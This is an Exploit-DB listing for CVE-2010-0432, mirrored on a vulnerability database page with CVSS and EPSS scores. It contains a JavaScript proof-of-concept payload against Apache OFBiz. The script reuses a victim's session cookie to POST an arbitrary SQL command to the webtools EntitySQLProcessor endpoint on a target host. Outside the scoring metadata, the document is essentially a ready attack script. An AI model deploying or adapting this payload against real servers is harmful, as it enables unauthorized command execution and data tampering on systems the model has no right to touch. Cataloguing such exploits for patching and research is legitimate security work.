Lucene search

K
exploitdbLucas ApaEDB-ID:12263
HistoryApr 16, 2010 - 12:00 a.m.

Apache OFBiz - Remote Execution (via SQL Execution)

2010-04-1600:00:00
Lucas Apa
www.exploit-db.com
68

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

6.4

Confidence

Low

EPSS

0.013

Percentile

86.0%

/*

Apache OFBiz SQL Remote Execution PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

*/

var cmd = 'command';

var xmlhttp=false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
xmlhttp=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp = window.createRequest();
} catch (e) {
xmlhttp=false;
}
}

xmlhttp.open("POST", "
https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true);
xmlhttp.onreadystatechange=function() {
if (xmlhttp2.readyState==4) {
//alert(xmlhttp.responseText)
}
}

var cookie = unescape(document.cookie);
xmlhttp.setRequestHeader("content-type",
"application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("cookie", cookie);
var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();
var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();
var post_data = str1+cmd+str2;
xmlhttp.send(post_data);

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score

6.4

Confidence

Low

EPSS

0.013

Percentile

86.0%